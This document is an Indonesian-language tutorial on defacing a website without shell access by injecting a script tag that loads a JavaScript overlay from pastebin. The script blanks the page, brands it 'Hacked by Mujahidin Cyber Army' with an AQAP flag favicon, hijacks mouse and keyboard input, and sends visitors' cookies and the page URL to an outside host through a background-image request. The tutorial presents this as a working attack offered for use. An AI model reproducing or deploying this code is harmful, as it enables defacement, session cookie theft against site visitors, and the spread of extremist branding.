Tutorial Deface Index Tanpa Shell Dengan JS Overlay

Assalamualaikum,
Kali ini kita akan belajat tentang cara deface tanpa akses shell. Karena dalam beberapa kasus, kita tidak bisa upload sesuatu,atau memang tidak ada fitur upload didalam CMS target. Oleh  karena itu kita akan belajar car deface tanpa akses shell. Langsung saja...


Pertama, Kita buat script JS Overlay nya

/*
<style>html,body{color:#ffffff}</style><font color='white'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/">
*/
document.getElementsByTagName('body')[0].innerHTML=""
document.title="Hacked by Mujahidin Cyber Army "
var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="https://www.counterextremism.com/sites/default/files/styles/medium/public/person_headshots/AQAP_flag.jpg?itok=D4KcVU-N";document.getElementsByTagName("head")[0].appendChild(shortc)
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("Hacked?");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('Izza009');
}
if(location.href.indexOf('mujahidincyberarmy.blogspot.com')==-1)setTimeout("alert('Mujahidin Cyber Army Was Here');",3000);
else setTimeout("kasih_tau()",3000);
if(navigator.userAgent.indexOf('MSIE')!=-1){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://zonehmirrors.org/defaced/2017/02/21/www.entam.net/www.entam.net' height='650px' width='1300px' scrolling='no' frameborder='0'></center>";
}
else{
if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
//muter2();
log="";
if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="1337@null.net";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
document.getElementsByTagName('body')[0].style.cssText="background-color:black"+log
window.onload=function(){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://zonehmirrors.org/defaced/2017/02/21/www.entam.net/www.entam.net' height='650px' width='1300px' scrolling='no' frameborder='0'></center>";
document.getElementsByTagName('body')[0].style.cssText="background-color:#ffffff;background-image:url(mujahidincyberarmy.blogspot.com)!important;";
}
}
}
 

Note: - Warna merah untuk alert
         - Warna biru untuk link deface kalian / bekas / mirror , untuk menutupi halaman yang kita JS Overlay (saya menggunakan link bekas deface web www.entam.net dari zone-h)

Kedua, masukkan script diatas ke pastebin  kemudian klik raw. (Ex: https://pastebin.com/raw/YPfDRDuJ)
 
Ketiga, Masukkan link hasil raw tadi ke scrip berikut:

<script type="text/javascript" src="https://pastebin.com/raw/YPfDRDuJ"></script>

Note: - Warna merah diganti dengan scrip kamu yang di raw pastebin tadi.

Untuk deface nya, tinggal posting sesuatu di website target dengan menggunakan title/judul script diatas.

contoh : Aku berhasil masuk di website, lalu aku edit bagian footernya menggunakan script tadi.

Lalu jangan lupa untuk disave, dan kita buka hasilnya... :D